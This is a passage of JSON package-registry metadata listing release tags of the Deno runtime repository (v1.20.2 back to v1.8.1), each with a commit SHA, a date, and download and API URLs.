2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8